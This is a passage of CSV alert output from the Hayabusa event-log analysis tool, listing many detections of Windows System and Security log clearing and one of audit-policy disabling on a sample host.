admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.527 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.574 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.591 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.606 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.638 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.653 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.669 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.794 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.841 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.888 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.903 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.950 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.028 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.044 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.059 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.075 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.138 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.200 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.216 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.231 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.263 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.294 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.309 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.325 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.341 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.356 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.403 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.419 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.434 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.450 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.497 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.528 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.763 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.794 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.809 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.934 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.997 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.028 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.091 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.200 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.216 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.247 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.341 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.388 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.403 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.450 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.559 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.575 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.622 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.700 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.778 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.825 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.841 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.872 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.888 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.903 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.059 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.075 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.153 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.247 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:21:02.504 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Audit policy enumerated.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy 